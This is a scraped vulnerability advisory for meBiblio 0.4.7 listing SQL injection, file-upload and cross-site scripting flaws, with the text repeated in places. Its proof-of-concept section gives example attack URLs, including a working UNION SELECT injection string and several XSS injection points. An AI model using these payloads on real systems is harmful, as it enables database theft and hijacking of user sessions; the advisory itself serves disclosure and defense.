meBiblio Multiple Input Validation Vulnerabilities
BID:29465
Info
meBiblio Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 29465 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2648 CVE-2008-2646 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 02 2008 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | CWH Underground |
| Vulnerable: |
meBiblio meBiblio 0.4.7 |
| Not Vulnerable: | |
Discussion
meBiblio Multiple Input Validation Vulnerabilities
meBiblio is prone to multiple input-validation vulnerabilities, including an SQL injection issue, an arbitrary-file-upload issue, and multiple cross-site scripting issues.
Successful exploits will allow attackers to execute arbitrary script code in the context of the application or the browser of an unsuspecting user and compromise the application. Attackers can also access or modify data or exploit latent vulnerabilities in the underlying database. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
meBiblio 0.4.7 is vulnerable; other versions may also be affected.
meBiblio is prone to multiple input-validation vulnerabilities, including an SQL injection issue, an arbitrary-file-upload issue, and multiple cross-site scripting issues.
Successful exploits will allow attackers to execute arbitrary script code in the context of the application or the browser of an unsuspecting user and compromise the application. Attackers can also access or modify data or exploit latent vulnerabilities in the underlying database. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
meBiblio 0.4.7 is vulnerable; other versions may also be affected.
Exploit / POC
meBiblio Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser.
The following example exploits are available:
http://www.example.com/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2
http://www.example.com/[path]/dbadd.inc.php?sql=<XSS>
http://www.example.com]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://www.example.com/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://www.example.com/[path]/search_mask.inc.php?LabelYear=<XSS>
Attackers can exploit these issues via a browser.
The following example exploits are available:
http://www.example.com/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2
http://www.example.com/[path]/dbadd.inc.php?sql=<XSS>
http://www.example.com]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://www.example.com/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://www.example.com/[path]/search_mask.inc.php?LabelYear=<XSS>
Solution / Fix
meBiblio Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].